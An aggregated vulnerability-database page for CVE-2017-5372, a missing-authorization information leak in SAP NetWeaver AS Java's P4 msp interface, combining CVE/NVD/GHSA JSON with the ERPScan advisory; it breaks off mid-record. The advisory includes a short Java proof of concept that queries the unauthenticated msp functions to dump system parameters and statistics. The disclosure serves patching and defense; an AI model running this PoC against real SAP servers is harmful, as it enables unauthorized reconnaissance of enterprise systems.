cvelistv5 - cve-2017-5372

cve-2017-5372

Vulnerability from cvelistv5

Published

2017-01-23 21:00

Modified

2024-08-05 14:55

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html	Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2017/Jan/50	Mailing List, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/93504	Third Party Advisory, VDB Entry
cve@mitre.org	https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
cve@mitre.org	https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2017/Jan/50	Mailing List, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/93504	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
af854a3a-2127-422b-91ae-364da2661108	https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/

Impacted products

Vendor

Product

Version

▼

n/a

Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T14:55:35.809Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
          },
          {
            "name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
          },
          {
            "name": "93504",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/93504"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-10-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-12-10T17:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
        },
        {
          "name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
        },
        {
          "name": "93504",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/93504"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-5372",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/",
              "refsource": "MISC",
              "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
            },
            {
              "name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
            },
            {
              "name": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
            },
            {
              "name": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/",
              "refsource": "MISC",
              "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
            },
            {
              "name": "93504",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/93504"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-5372",
    "datePublished": "2017-01-23T21:00:00",
    "dateReserved": "2017-01-13T00:00:00",
    "dateUpdated": "2024-08-05T14:55:35.809Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5007E3B7-3C36-4256-9E01-51C6F52FD0FF\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.\"}, {\"lang\": \"es\", \"value\": \"La funci\\u00f3n msp (tambi\\u00e9n conocida como MSPRuntimeInterface) en el componente P4 SERVERCORE en SAP AS JAVA permite a atacantes remotos obtener informaci\\u00f3n sensible del sistema aprovechando una verificaci\\u00f3n de autorizaci\\u00f3n perdida para la funci\\u00f3n (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic o (5) getClientStatistic, vulnerabilidad tambi\\u00e9n conocida como SAP Security Note 2331908.\"}]",
      "id": "CVE-2017-5372",
      "lastModified": "2024-11-21T03:27:28.123",
      "metrics": "{\"cvssMetricV30\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:N/A:N\", \"baseScore\": 5.0, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 10.0, \"impactScore\": 2.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2017-01-23T21:59:03.220",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2017/Jan/50\", \"source\": \"cve@mitre.org\", \"tags\": [\"Mailing List\", \"VDB Entry\"]}, {\"url\": \"http://www.securityfocus.com/bid/93504\", \"source\": \"cve@mitre.org\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\", \"source\": \"cve@mitre.org\"}, {\"url\": \"https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2017/Jan/50\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\", \"VDB Entry\"]}, {\"url\": \"http://www.securityfocus.com/bid/93504\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-200\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2017-5372\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2017-01-23T21:59:03.220\",\"lastModified\":\"2024-11-21T03:27:28.123\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.\"},{\"lang\":\"es\",\"value\":\"La funci\u00f3n msp (tambi\u00e9n conocida como MSPRuntimeInterface) en el componente P4 SERVERCORE en SAP AS JAVA permite a atacantes remotos obtener informaci\u00f3n sensible del sistema aprovechando una verificaci\u00f3n de autorizaci\u00f3n perdida para la funci\u00f3n (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic o (5) getClientStatistic, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2331908.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:N/A:N\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5007E3B7-3C36-4256-9E01-51C6F52FD0FF\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2017/Jan/50\",\"source\":\"cve@mitre.org\",\"tags\":[\"Mailing List\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/93504\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2017/Jan/50\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/93504\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

ghsa-8fqv-mx8w-2w8h

Vulnerability from github

Published

2022-05-14 01:50

Modified

2022-05-14 01:50

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2017-5372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-01-23T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.",
  "id": "GHSA-8fqv-mx8w-2w8h",
  "modified": "2022-05-14T01:50:42Z",
  "published": "2022-05-14T01:50:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5372"
    },
    {
      "type": "WEB",
      "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure"
    },
    {
      "type": "WEB",
      "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/93504"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908. SAP Netweaver Application Server Java is prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.11-7.4

Vendor URL: http://SAP.com

Bugs: Information disclosure

Sent: 10.03.2016

Reported: 11.03.2016

Vendor response: 11.03.2016

Date of Public Advisory: 12.10.2016

Reference: SAP Security Note 2331908

Author: Vahagn @vah_13 Vardanyan (ERPScan)

Description

ADVISORY INFORMATION

Title:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE INFORMATION DISCLOSURE

Advisory ID:[ERPSCAN-16-037]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/

Date published: 11.01.2017

Vendors contacted: SAP

VULNERABILITY INFORMATION

Class: Information disclosure

Impact: broken authentication

Remotely Exploitable: yes

Locally Exploitable: no

CVE: CVE-2017-5372

CVSS Information

CVSS Base Score v3: 7.3 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity Low (L)

A : Impact to Availability Low (L)

VULNERABLE PACKAGES

SERVERCORE

7.11 7.20 7.30 7.31 7.40 7.50

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2331908

AUTHOR

Vahagn Vardanyan (ERPScan)

TECHNICAL DESCRIPTION

SAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any authorization to call the following functions:

getInformation

getParameters

getServiceInfo

getStatistic

getClientStatistic

PoC (Java language)

package sap_p4_poc;

Properties p = new Properties();

p.put("java.naming.factory.initial", "com.sap.engine.services.jndi.InitialContextFactoryImpl");

p.put("java.naming.provider.url", SAP_IP+":"+SAP_PORT);

InitialContext initialContext = new InitialContext(p);

Context initialContext = initialContext;

MSPRuntimeInterface serialObj = (MSPRuntimeInterface)initialContext.lookup("msp");

System.out.println("----------------" + serialObj + "----------------------------------------");

System.out.println("----------------SID:" + serialObj.getSystemId() + "----------------------------------------");

System.out.println("----------------------getInformation:--------------------------------");

TreeMap Inf = serialObj.getInformation();

print_treee_map(Inf);

System.out.println("----------------------getParameters:----------------------------------");

TreeMap Par = serialObj.getParameters();

print_treee_map(Par);

System.out.println("-----------------------getServiceInfo:---------------------------------");

TreeMap Serv = serialObj.getServiceInfo();

print_treee_map(Serv);

System.out.println("-----------------------getStatistic:---------------------------------");

TreeMap Stat = serialObj.getStatistic();

print_treee_map(Stat);

System.out.println("-----------------------getClientStatistic:---------------------------------");

TreeMap Cli = serialObj.getClientStatistic();

print_treee_map(Cli);

REPORT TIMELINE

Reported: 11.03.2016

Vendor response: 11.03.2016

Date of Public Advisory: 12.10.2016

REFERENCES

https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/

ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches.

ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research.

ABOUT ERPScan

ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP Solution providersa and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions.

ERPScanas primary mission is to close the gap between technical and business security, and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale.

We afollow the suna and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe.

Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0793",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver",
        "scope": null,
        "trust": 1.4,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "*"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.50"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.42"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.40"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.31"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.30"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.20"
      },
      {
        "model": "netweaver as java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Vahagn Vardanyan (ERPScan)",
    "sources": [
      {
        "db": "BID",
        "id": "93504"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-5372",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
